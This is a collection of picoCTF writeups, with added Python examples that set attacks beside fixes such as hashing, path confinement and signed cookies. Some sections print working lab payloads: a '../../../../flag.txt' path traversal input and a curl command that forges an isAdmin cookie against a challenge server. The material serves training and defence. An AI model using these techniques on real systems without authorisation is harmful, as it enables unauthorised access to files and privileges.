                System.out.println("You have " + (2 - i) + " attempt(s) left");
                i++;
                continue;
            }
            break;
        }
    }

    public static boolean openSafe(String password) {
        String encodedkey = "cGwzYXMzX2wzdF9tM18xbnQwX3RoM19zYWYz";

        if (password.equals(encodedkey)) {
            System.out.println("Sesame open");
            return true;
        }
        else {
            System.out.println("Password is incorrect\n");
            return false;
        }
    }
}
```

In the `main` function a `Base64.Encoder` is created and the typed password is encoded with it before it is compared.
In the `openSafe` function the comparison target, `encodedkey`, looks like a [base64](https://en.wikipedia.org/wiki/Base64) encoded password: `cGwzYXMzX2wzdF9tM18xbnQwX3RoM19zYWYz`.
Base64 is an encoding, not encryption, so the password is recovered by simply decoding it.

I used [CyberChef's 'From Base64' recipe](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)) to decode the password.

Finally, follow the instructions in the challenge description to create the flag.
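The check above is reversible because it compares encodings rather than secrets. The following is an added example, not part of this writeup or the challenge, written in Python rather than the challenge's Java: it reproduces the shape of `openSafe` with a constructed stored value (the challenge's own base64 string is deliberately not decoded here), recovers the password the way the CyberChef step does, and then shows a salted PBKDF2 verifier with a constant-time comparison as the non-reversible alternative. The stored value, iteration count and function names are assumptions of the example.

```python
import base64
import hashlib
import hmac
import os

# What SafeOpener does: encode the guess and compare it with a stored
# encoding. Base64 is reversible, so anyone holding the class file
# recovers the password with one decode call. Constructed stored value.
STORED_ENCODED = base64.b64encode(b"constructed-example-password").decode()


def open_safe_base64(guess):
    """Same logic as openSafe(): encode the guess, compare strings."""
    return base64.b64encode(guess.encode()).decode() == STORED_ENCODED


def recover_password_from_encoding(stored=STORED_ENCODED):
    """The reversal CyberChef's 'From Base64' performs in the writeup."""
    return base64.b64decode(stored).decode()


# A non-reversible alternative: salted PBKDF2-HMAC-SHA256, compared in
# constant time. Iteration count is an example value, kept modest here.
ITERATIONS = 100_000


def make_verifier(password, salt=None):
    """Return (salt, digest); store these instead of the password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def open_safe_hashed(guess, verifier):
    """Recompute the digest for the guess and compare without early exit."""
    salt, digest = verifier
    candidate = hashlib.pbkdf2_hmac("sha256", guess.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print("decoded:", recover_password_from_encoding())
    verifier = make_verifier("constructed-example-password")
    print("hashed check, right guess:", open_safe_hashed("constructed-example-password", verifier))
    print("hashed check, wrong guess:", open_safe_hashed("wrong", verifier))
```

Hashing turns recovery from a single decode into a brute-force search over candidate passwords; against someone holding the binary it buys cost, not secrecy, which is why a secret that must stay secret does not belong in the program at all.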

For additional information, please see the references below.

## References

- [Base64 - Wikipedia](https://en.wikipedia.org/wiki/Base64)
- [CyberChef - Homepage](https://gchq.github.io/CyberChef/)
- [Java (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Java_(programming_language))

--------------------------------------------------------------------------------
/picoCTF_2022/Reverse_Engineering/file-run1.md:
--------------------------------------------------------------------------------

# file-run1

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Reverse Engineering
Author: WILL HONG

Description:
A program has been provided to you, what happens if you try to run it on the command line?

Download the program here.

Hints:
1. To run the program at all, you must make it executable (i.e. $ chmod +x run)
2. Try running it by adding a '.' in front of the path to the file (i.e. $ ./run)
```

Challenge link: [https://play.picoctf.org/practice/challenge/266](https://play.picoctf.org/practice/challenge/266)

## Solution

This challenge is really simple and the hints give it all away

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run1]
└─$ chmod +x run

┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run1]
└─$ ./run
The flag is: picoCTF{}
```

If you need more information, please see the references below.

## References

- [Linux path environment variable](https://linuxconfig.org/linux-path-environment-variable)
- [Linux file permissions explained](https://www.redhat.com/sysadmin/linux-file-permissions-explained)

--------------------------------------------------------------------------------
/picoCTF_2022/Reverse_Engineering/file-run2.md:
--------------------------------------------------------------------------------

# file-run2

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Reverse Engineering
Author: WILL HONG

Description:
Another program, but this time, it seems to want some input.
What happens if you try to run it on the command line with input "Hello!"?

Download the program here.

Hints:
1. Try running it and add the phrase "Hello!" with a space in front (i.e. "./run Hello!")
```

Challenge link: [https://play.picoctf.org/practice/challenge/267](https://play.picoctf.org/practice/challenge/267)

## Solution

Like the [previous challenge](file-run1.md) this challenge is really simple and the hint gives it all away.

But let's play around with it anyway

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run2]
└─$ chmod +x run

┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run2]
└─$ ./run
Run this file with only one argument

┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run2]
└─$ ./run My_argument
Won't you say 'Hello!' to me first?

┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/File_Run2]
└─$ ./run Hello!
The flag is: picoCTF{}
```

If you need more information, please see the references below.

## References

- [Linux path environment variable](https://linuxconfig.org/linux-path-environment-variable)
- [Linux file permissions explained](https://www.redhat.com/sysadmin/linux-file-permissions-explained)
- [Linux Commands and arguments](https://www.w3resource.com/linux-system-administration/commands-and-arguments.php)

--------------------------------------------------------------------------------
/picoCTF_2022/Reverse_Engineering/jadx-gui_decompilation.png:
--------------------------------------------------------------------------------

https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2022/Reverse_Engineering/jadx-gui_decompilation.png

--------------------------------------------------------------------------------
/picoCTF_2022/Reverse_Engineering/patchme.py.md:
--------------------------------------------------------------------------------

# patchme.py

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Reverse Engineering
Author: LT 'SYREAL' JONES

Description:
Can you get the flag?

Run this Python program in the same directory as this encrypted flag.

Hints:
(None)
```

Challenge link: [https://play.picoctf.org/practice/challenge/287](https://play.picoctf.org/practice/challenge/287)

## Solution

Let's start by looking at the Python source code (with some empty lines removed)

```python
### THIS FUNCTION WILL NOT HELP YOU FIND THE FLAG --LT ########################
def str_xor(secret, key):
    #extend key to secret length
    new_key = key
    i = 0
    while len(new_key) < len(secret):
        new_key = new_key + key[i]
        i = (i + 1) % len(key)
    return "".join([chr(ord(secret_c) ^ ord(new_key_c)) for (secret_c,new_key_c) in zip(secret,new_key)])
###############################################################################

flag_enc = open('flag.txt.enc', 'rb').read()

def level_1_pw_check():
    user_pw = input("Please enter correct password for flag: ")
    if( user_pw == "ak98" + \
                   "-=90" + \
                   "adfjhgj321" + \
                   "sleuth9000"):
        print("Welcome back... your flag, user:")
        decryption = str_xor(flag_enc.decode(), "utilitarian")
        print(decryption)
        return
    print("That password is incorrect")

level_1_pw_check()
```

In the `level_1_pw_check` function we see a password comparison against several string literals concatenated together.
The plus operator just joins the strings, giving `ak98-=90adfjhgj321sleuth9000`.

Use this as the password when running the script and you get the flag

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/Patchme.py]
└─$ python patchme.flag.py
Please enter correct password for flag: ak98-=90adfjhgj321sleuth9000
Welcome back... your flag, user:
picoCTF{}
```

For additional information, please see the references below.
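Entering the password is the intended route, but the challenge name hints at a patch, and the source makes one unnecessary: the XOR key `utilitarian` is a literal in the script. The following is an added example, not code from the writeup or the challenge files: it reproduces the challenge's `str_xor` unchanged, decrypts without going through `level_1_pw_check`, and shows that even without the source the known flag prefix `picoCTF{` leaks the first eight key characters of a repeating-key XOR. The sample ciphertext is constructed; the real `flag.txt.enc` is not used.

```python
def str_xor(secret, key):
    """Repeating-key XOR over str, character by character; this is the
    challenge's own routine, reproduced without changes."""
    # Extend the key to the secret's length by cycling through it.
    new_key = key
    i = 0
    while len(new_key) < len(secret):
        new_key = new_key + key[i]
        i = (i + 1) % len(key)
    return "".join(chr(ord(s) ^ ord(k)) for s, k in zip(secret, new_key))


def decrypt_without_password(enc_text, key="utilitarian"):
    """The patch: skip level_1_pw_check and call str_xor directly.
    XOR is its own inverse, and the key is hard-coded, so the password
    prompt guards nothing."""
    return str_xor(enc_text, key)


def recover_key_prefix(enc_text, known_plaintext):
    """Known-plaintext attack on repeating-key XOR: cipher ^ plain == key,
    so a known prefix such as 'picoCTF{' yields the first len(prefix)
    characters of the key without reading the source at all."""
    return str_xor(enc_text[:len(known_plaintext)], known_plaintext)


# Constructed stand-in for flag.txt.enc (not the challenge file).
SAMPLE_PLAINTEXT = "picoCTF{constructed_example_flag}"
SAMPLE_ENC = str_xor(SAMPLE_PLAINTEXT, "utilitarian")

if __name__ == "__main__":
    print(decrypt_without_password(SAMPLE_ENC))
    print(recover_key_prefix(SAMPLE_ENC, "picoCTF{"))
```

The second function is the reason the author's banner comment is only half a joke: `str_xor` will not find the flag for you, but a fixed key reused across a predictable prefix does most of the work on its own.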

## References

- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))
- [Python Tutorial - 7 Ways to Concatenate Strings in Python](https://www.pythontutorial.net/python-string-methods/python-string-concatenation/)
- [Python - Common string operations](https://docs.python.org/3/library/string.html)

--------------------------------------------------------------------------------
/picoCTF_2022/Reverse_Engineering/unpackme.py.md:
--------------------------------------------------------------------------------

# unpackme.py

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Reverse Engineering, packing
Author: LT 'SYREAL' JONES

Description:
Can you get the flag?

Reverse engineer this Python program.

Hints:
(None)
```

Challenge link: [https://play.picoctf.org/practice/challenge/314](https://play.picoctf.org/practice/challenge/314)

## Solution

Let's start by looking at the Python source code given (with some empty lines removed)

```python
import base64
from cryptography.fernet import Fernet

payload = b'gAAAAABiMD06eCisTWoohiYL5jHGdCte5LAviTFguZQSIyRLAWICJpmdrgxhdTB923h6eksddKpKH41I5-HGzI6xGF_7eb_1u0S2Phw2NvYGTF1KzE1-AU66FfIW6QXWnCpPHOS9CatNBuFXuyjEAx86Rld2E7GjvuKEOJJXx_GZE2JgAxnDmvcewoksfjVCCAwNqzixpUPKkIET2xmO4EsDqK4CUG8_JxP0HwSEzW4PH-hVpZrkyse4EodFPsjs7NVJF0hL1_8bP1TCiEEnFn7hCoTRRvlpYQ=='

key_str = 'correctstaplecorrectstaplecorrec'
key_base64 = base64.b64encode(key_str.encode())
f = Fernet(key_base64)
plain = f.decrypt(payload)
exec(plain.decode())
```

OK, so we have an encrypted payload that gets decrypted and then executed with the `exec` function.
The Fernet key is built from a string literal right there in the script, so the decryption needs nothing from us.

Let's run the script and see what happens

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/Unpackme.py]
└─$ python unpackme.flag.py
What's the password? test
That password is incorrect.
```

Why not simply change the last `exec(plain.decode())` to `print(plain.decode())` and run the script again?
Note, the flag is redacted below.

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Reverse_Engineering/Unpackme.py]
└─$ python unpackme.flag.py

pw = input('What\'s the password? ')

if pw == 'batteryhorse':
    print('picoCTF{}')
else:
    print('That password is incorrect.')

```

And there is the flag.

For additional information, please see the references below.
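Swapping `exec` for `print`, as above, works but means editing every packed script by hand. The following is an added example, not from the writeup: a small harness that runs a loader with `exec` replaced by a recording function, so the unpacked stage is captured as text and then inspected statically with `ast` for hard-coded strings. The loader shown is a constructed stand-in that protects its stage with base64 instead of Fernet so the example needs no third-party package; its password and flag text are made up. The loader's own top-level code (imports, key handling, decryption) still executes with this approach, so run it in a throwaway environment.

```python
import ast
import base64
import builtins

# The stage the loader unpacks. Constructed stand-in for the challenge's
# Fernet payload; password and flag text are made up.
INNER_STAGE = (
    "pw = input('What\\'s the password? ')\n"
    "if pw == 'constructed_password':\n"
    "    print('picoCTF{constructed_example}')\n"
    "else:\n"
    "    print('That password is incorrect.')\n"
)

# The loader: same shape as unpackme.flag.py (decode, then exec), with
# base64 standing in for Fernet so nothing outside the stdlib is needed.
LOADER = (
    "import base64\n"
    f"payload = {base64.b64encode(INNER_STAGE.encode())!r}\n"
    "plain = base64.b64decode(payload)\n"
    "exec(plain.decode())\n"
)


def capture_unpacked_stage(loader_source):
    """Run the loader under a builtins table whose exec() only records its
    argument. The loader's top-level code runs; the unpacked stage does not."""
    captured = []

    def recording_exec(code, *args, **kwargs):
        captured.append(code.decode() if isinstance(code, bytes) else code)

    sandbox = {"__builtins__": dict(vars(builtins), exec=recording_exec)}
    exec(loader_source, sandbox)
    return captured


def string_literals(source):
    """Static follow-up on a captured stage: list its string constants
    (hard-coded passwords and flags show up here) without running it."""
    tree = ast.parse(source)
    return [n.value for n in ast.walk(tree)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


if __name__ == "__main__":
    for stage in capture_unpacked_stage(LOADER):
        print(stage)
        print(string_literals(stage))
```

For the real script the only change is that the loader imports `cryptography.fernet`; the captured stage is the same text the writeup prints, obtained without letting it run.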

## References

- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))
- [python exec() - programiz](https://www.programiz.com/python-programming/methods/built-in/exec)

--------------------------------------------------------------------------------
/picoCTF_2022/Web_Exploitation/Forbidden_Paths.md:
--------------------------------------------------------------------------------

# Forbidden Paths

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Web Exploitation
Author: LT 'SYREAL' JONES

Description:
Can you get the flag?
Here's the website.

We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt
but the website is filtering absolute file paths. Can you get past the filter to read the flag?

Hints:
(None)
```

Challenge link: [https://play.picoctf.org/practice/challenge/270](https://play.picoctf.org/practice/challenge/270)

## Solution

The challenge name and description suggest that this challenge will be a [directory traversal attack](https://en.wikipedia.org/wiki/Directory_traversal_attack).

### Browse to the web site

Browse to the web site and we get a webpage titled `Web eReader`.
On the page there is a textbox and a `Read`-button.
We seem to be able to read a file of our choice.

From the challenge description we know that the root of the website is at `/usr/share/nginx/html/` and the flag is at `/flag.txt`.
The filter only blocks absolute paths, so a relative path that climbs out of the web root is still accepted.
Relative to the web root the flag is at `../../../../flag.txt`. Let's try to read it.
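Filtering absolute paths leaves every relative `..` sequence intact, which is exactly what the traversal relies on. The following is an added example, not code from the writeup or the challenge's eReader: it contrasts that absolute-only filter with a lexical normalise-then-confine check for the web root the challenge states. The request paths are constructed test inputs.

```python
import posixpath

# The web root the challenge states; requests below are constructed.
WEB_ROOT = "/usr/share/nginx/html"


def naive_filter(requested):
    """What the eReader does: reject absolute paths only.
    Returns the path that would be opened, or None if rejected."""
    if requested.startswith("/"):
        return None
    return posixpath.join(WEB_ROOT, requested)   # '..' segments survive


def safe_join(requested):
    """Normalise the joined path lexically, then require it to stay under
    the root. Returns the resolved path, or None if it escapes.
    Apply this to the URL-decoded path; on a real filesystem follow it
    with os.path.realpath so a symlink cannot point outside the root."""
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, requested))
    if candidate == WEB_ROOT or candidate.startswith(WEB_ROOT + "/"):
        return candidate
    return None


# One legitimate request, the writeup's traversal, and the absolute path
# the challenge already blocks.
REQUESTS = ["books/chapter1.txt", "../../../../flag.txt", "/flag.txt"]

if __name__ == "__main__":
    for r in REQUESTS:
        print(f"{r!r:28} naive={naive_filter(r)!r:48} safe={safe_join(r)!r}")
```

Note that `posixpath.join` discards the root when the second argument is absolute, so `safe_join` handles `/flag.txt` and `../../../../flag.txt` by the same rule: whatever the input, the normalised result must sit under `WEB_ROOT`.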

### Get the flag

Enter `../../../../flag.txt` in the textbox and press the `Read`-button and we get the flag.

For additional information, please see the references below.

## References

- [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
- [File path traversal - PortSwigger](https://portswigger.net/kb/issues/00100300_file-path-traversal)
- [Path Traversal - OWASP](https://owasp.org/www-community/attacks/Path_Traversal)

--------------------------------------------------------------------------------
/picoCTF_2022/Web_Exploitation/Includes.md:
--------------------------------------------------------------------------------

# Includes

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Easy
Tags: picoCTF 2022, Web Exploitation, inspector
Author: LT 'SYREAL' JONES

Description:
Can you get the flag?

Go to this website and see what you can discover.

Hints:
1. Is there more code than what the inspector initially shows?
```

Challenge link: [https://play.picoctf.org/practice/challenge/274](https://play.picoctf.org/practice/challenge/274)

## Solution

Browse to the web site and then right-click and select 'View page source'.
You will see the following HTML code (only its text content survives here; the page also references `style.css` and `script.js`)

```html
On Includes

On Includes

Many programming languages and other computer files have a directive,
often called include (sometimes copy or import), that causes the
contents of a second file to be inserted into the original file. These
included files are called copybooks or header files. They are often used
to define the physical layout of program data, pieces of procedural code
and/or forward declarations while promoting encapsulation and the reuse
of code.

Source: Wikipedia on Include directive
```

There is no flag visible here, but there are two additional files to check out.

Click on the 'style.css' link to view that file

```css
body {
  background-color: lightblue;
}

/* picoCTF{1nclu51v17y_1of2_ */
```

There is the first part of the flag as a comment.

Now go back to the HTML source and click on the 'script.js' link

```javascript
function greetings()
{
  alert("This code is in a separate file!");
}

// f7w_2of2_df589022}
```

There is the second part of the flag as a comment.

Combine the two parts and you have the flag.

For additional information, please see the references below.

## References

- [CSS - Wikipedia](https://en.wikipedia.org/wiki/CSS)
- [HTML - Wikipedia](https://en.wikipedia.org/wiki/HTML)
- [JavaScript - Wikipedia](https://en.wikipedia.org/wiki/JavaScript)

--------------------------------------------------------------------------------
/picoCTF_2022/Web_Exploitation/Inspect_HTML.md:
--------------------------------------------------------------------------------

# Inspect HTML

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Easy
Tags: picoCTF 2022, Web Exploitation, inspector
Author: LT 'SYREAL' JONES

Description:
Can you get the flag?

Go to this website and see what you can discover.

Hints:
1. What is the web inspector in web browsers?
```

Challenge link: [https://play.picoctf.org/practice/challenge/275](https://play.picoctf.org/practice/challenge/275)

## Solution

Let's start by browsing to the web site and checking the HTML source code.
Press `CTRL + U` or right-click anywhere on the background and select `View page source`.
Only the text content of the page survives here:

```html
On Histiaeus

On Histiaeus

However, according to Herodotus, Histiaeus was unhappy having to stay in
Susa, and made plans to return to his position as King of Miletus by
instigating a revolt in Ionia. In 499 BC, he shaved the head of his
most trusted slave, tattooed a message on his head, and then waited for
his hair to grow back. The slave was then sent to Aristagoras, who was
instructed to shave the slave's head again and read the message, which
told him to revolt against the Persians.

Source: Wikipedia on Histiaeus
```

The flag is in a comment at the end of the HTML source (but redacted here).

For additional information, please see the references below.

## References

- [HTML - Wikipedia](https://en.wikipedia.org/wiki/HTML)

--------------------------------------------------------------------------------
/picoCTF_2022/Web_Exploitation/Power_Cookie.md:
--------------------------------------------------------------------------------

# Power Cookie

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Web Exploitation, cookie
Author: LT 'SYREAL' JONES

Description:
Can you get the flag?
Go to this website and see what you can discover.

Hints:
1. Do you know how to modify cookies?
```

Challenge link: [https://play.picoctf.org/practice/challenge/288](https://play.picoctf.org/practice/challenge/288)

## Solution

### Browse to the web site

Browse to the web site and we get a web page titled `Online Gradebook`.
On the page there is a `Continue as guest`-button.
Press the button and we are redirected to `/check.php`, where the text `We apologize, but we have no guest services at the moment.` is shown.

### Check for cookies

Press F12 to open DevTools and go to the `Application` tab.
Under `Storage` and then `Cookies` select the web site.
Note that there is a cookie named `isAdmin` with the value of `0`.
The server trusts this client-controlled value as-is, so nothing stops us from changing it.

### Get the flag in the browser

Set the cookie value to 1 and reload the web page by pressing `F5` to get the flag.
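The gradebook trusts a value that lives in the client's browser, so changing `0` to `1` is all it takes. The following is an added example, not code from the writeup or the challenge's `check.php`: it models that unsigned check beside an HMAC-signed cookie and shows that the same DevTools edit no longer works on the signed form. The server key, cookie values and function names are constructed.

```python
import hashlib
import hmac

# Constructed server-side key. In a real deployment it comes from
# configuration and is never sent to the client.
SERVER_SECRET = b"constructed-server-side-secret-do-not-reuse"


def is_admin_unsigned(cookie_value):
    """The gradebook's logic as the writeup observes it: trust the client."""
    return cookie_value == "1"


def sign_cookie(value, key=SERVER_SECRET):
    """value + '.' + hex HMAC-SHA256(value) under the server key."""
    tag = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def verify_cookie(signed, key=SERVER_SECRET):
    """Return the value if its tag checks out, else None."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    # compare_digest does not leak the position of the first mismatch.
    return value if hmac.compare_digest(expected, tag) else None


def is_admin_signed(signed_cookie):
    """Authorisation decision on the verified value only."""
    return verify_cookie(signed_cookie) == "1"


def flip_value_in_devtools(signed_cookie):
    """The writeup's edit applied to the signed form: the value changes
    but the tag still covers the old value, so verification fails."""
    _, _, tag = signed_cookie.rpartition(".")
    return f"1.{tag}"


if __name__ == "__main__":
    guest = sign_cookie("0")
    print(guest)
    print("flipped accepted:", is_admin_signed(flip_value_in_devtools(guest)))
```

Signing stops tampering but not reading; the value is still visible in DevTools. The tidier design keeps the role on the server, keyed by an opaque session id, so the cookie carries nothing worth editing.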

### Get the flag with curl

Now that we have all the information we need to get the flag we can automate it with `curl` and `grep`

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Power_Cookie]
└─$ curl -s --cookie "isAdmin=1" http://saturn.picoctf.net:63041/check.php | grep -oE 'picoCTF{.*}'
picoCTF{}
```

For additional information, please see the references below.

## References

- [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html)
- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [HTTP cookie - Wikipedia](https://en.wikipedia.org/wiki/HTTP_cookie)

--------------------------------------------------------------------------------
/picoCTF_2022/Web_Exploitation/README.md:
--------------------------------------------------------------------------------

# Web Exploitation Challenges

## Easy Web Exploitation Challenges

- [Includes](Includes.md)
- [Inspect HTML](Inspect_HTML.md)
- [Local Authority](Local_Authority.md)

## Medium Web Exploitation Challenges

- [Forbidden Paths](Forbidden_Paths.md)
- [Power Cookie](Power_Cookie.md)
- [Roboto Sans](Roboto_Sans.md)
- [Search source](Search_source.md)
- [Secrets](Secrets.md)

--------------------------------------------------------------------------------
/picoCTF_2022/Web_Exploitation/Roboto_Sans.md:
--------------------------------------------------------------------------------

# Roboto Sans

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Web Exploitation
Author: MUBARAK MIKAIL

Description:
The flag is somewhere on this web application not necessarily on the website. Find it.
Check this out.

Hints:
(None)
```

Challenge link: [https://play.picoctf.org/practice/challenge/291](https://play.picoctf.org/practice/challenge/291)

## Solution

The challenge name suggests that we should investigate the [robots.txt](https://en.wikipedia.org/wiki/Robots.txt) file.

### Check the robots.txt file on the web site

Get the `robots.txt` file on the web site with `curl`

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans]
└─$ curl http://saturn.picoctf.net:59901/robots.txt
User-agent *
Disallow: /cgi-bin/
Think you have seen your flag or want to keep looking.

ZmxhZzEudHh0;anMvbXlmaW
anMvbXlmaWxlLnR4dA==
svssshjweuiwl;oiho.bsvdaslejg
Disallow: /wp-admin/
```

Hmm, we have a number of encoded strings. Some of them seem to be [base64 encoded](https://en.wikipedia.org/wiki/Base64).

### Try to decode the base64 encoded data

Trying different combinations of the encoded strings above we get a lot of `invalid input` errors.
But we get the following readable data

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans]
└─$ echo "ZmxhZzEudHh0" | base64 -d
flag1.txt

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans]
└─$ echo "anMvbXlmaWxlLnR4dA==" | base64 -d
js/myfile.txt
```

### Get the flag

So we have two possible locations for the flag file:

- flag1.txt
- js/myfile.txt

Let's try both of them.

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans]
└─$ curl http://saturn.picoctf.net:59901/flag1.txt
404 Not Found

404 Not Found

nginx/1.21.6

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans]
└─$ curl http://saturn.picoctf.net:59901/js/myfile.txt
picoCTF{}
```

For additional information, please see the references below.

## References

- [base64 - Linux manual page](https://man7.org/linux/man-pages/man1/base64.1.html)
- [Base64 - Wikipedia](https://en.wikipedia.org/wiki/Base64)
- [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html)
- [robots.txt - Wikipedia](https://en.wikipedia.org/wiki/Robots.txt)

--------------------------------------------------------------------------------
/picoCTF_2023/Binary_Exploitation/README.md:
--------------------------------------------------------------------------------

# Binary Exploitation Challenges

## Medium Binary Exploitation Challenges

- [babygame01](babygame01.md)
- [hijacking](hijacking.md)
- [two-sum](two-sum.md)
- [VNE](VNE.md)

## Hard Binary Exploitation Challenges

- [tic-tac](tic-tac.md)

--------------------------------------------------------------------------------
/picoCTF_2023/Binary_Exploitation/Twos_complement.png:
--------------------------------------------------------------------------------

https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Binary_Exploitation/Twos_complement.png

--------------------------------------------------------------------------------
/picoCTF_2023/Cryptography/README.md:
--------------------------------------------------------------------------------

# Cryptography Challenges

## Medium Cryptography Challenges

- [HideToSee](HideToSee.md)
- [ReadMyCert](ReadMyCert.md)
- [rotation](rotation.md)

--------------------------------------------------------------------------------
/picoCTF_2023/Cryptography/rotation.md:
--------------------------------------------------------------------------------

# rotation

- [Challenge information](#challenge-information)
- [CyberChef solution](#cyberchef-solution)
- [Python solution](#python-solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Cryptography
Author: LOIC SHEMA

Description:
You will find the flag after decrypting this file

Download the encrypted flag here.

Hints:
1. Sometimes rotation is right
```

Challenge link: [https://play.picoctf.org/practice/challenge/373](https://play.picoctf.org/practice/challenge/373)

## CyberChef solution

Open the file in [CyberChef](https://gchq.github.io/CyberChef/) and use the 'ROT13' recipe.
The default rotation is 13 steps. Change the amount until you find the flag. The correct amount is 18.

## Python solution

Even though it takes a bit longer, it's more fun to write a small Python script called `solve.py` to brute-force the challenge.

```python
#!/usr/bin/python

import string

alphabet = string.ascii_lowercase
alpha_len = len(alphabet)

def shift(cipher_text, key):
    # Rotate letters by `key` positions, preserving case; leave everything else alone
    result = ''
    for c in cipher_text:
        if c.islower():
            result += alphabet[(alphabet.index(c) + key) % alpha_len]
        elif c.isupper():
            result += alphabet[(alphabet.index(c.lower()) + key) % alpha_len].upper()
        else:
            result += c
    return result

# Read the encoded flag
with open("encrypted.txt", 'r') as fh:
    enc_flag = fh.read().strip()

# Try all 26 shifts and keep the one that yields the flag format
for i in range(1, alpha_len+1):
    plain = shift(enc_flag, i)
    if ('picoCTF' in plain):
        print("ROT-%02d: %s" % (i, plain))
```

Then make the script executable and run it

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/Cryptography/rotation]
└─$ chmod +x solve.py

┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/Cryptography/rotation]
└─$ ./solve.py
ROT-18: picoCTF{}
```

For additional information, please see the references below.

## References

- [CyberChef - Homepage](https://gchq.github.io/CyberChef/)
- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))
- [ROT13 - Wikipedia](https://en.wikipedia.org/wiki/ROT13)

--------------------------------------------------------------------------------
/picoCTF_2023/Forensics/PcapPoisoning.md:
--------------------------------------------------------------------------------

# PcapPoisoning

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2023, Forensics, pcap
Author: MUBARAK MIKAIL

Description:
How about some hide and seek heh?
Download this file and find the flag.

Hints:
(None)
```

Challenge link: [https://play.picoctf.org/practice/challenge/362](https://play.picoctf.org/practice/challenge/362)

## Solution

Open the PCAP file in [Wireshark](https://www.wireshark.org/) and take the description more or less literally by assuming that the flag is available in plain text somewhere in the packet capture.

Set a display filter of `tcp.payload contains "picoCTF"` and press Enter.

Only one packet matches, and the flag is indeed visible in the ASCII view of the packet bytes.

## References

- [Wireshark - Display Filters](https://wiki.wireshark.org/DisplayFilters)
- [Wireshark - Homepage](https://www.wireshark.org/)

--------------------------------------------------------------------------------
/picoCTF_2023/Forensics/README.md:
--------------------------------------------------------------------------------
# Forensics Challenges

## Medium Forensics Challenges

- [FindAndOpen](FindAndOpen.md)
- [hideme](hideme.md)
- [MSB](MSB.md)
- [PcapPoisoning](PcapPoisoning.md)

### Hard Forensics Challenges

- [Invisible WORDs](Invisible_WORDs.md)

--------------------------------------------------------------------------------
/picoCTF_2023/Forensics/StegSolve_MSB_data_extraction.png:
--------------------------------------------------------------------------------
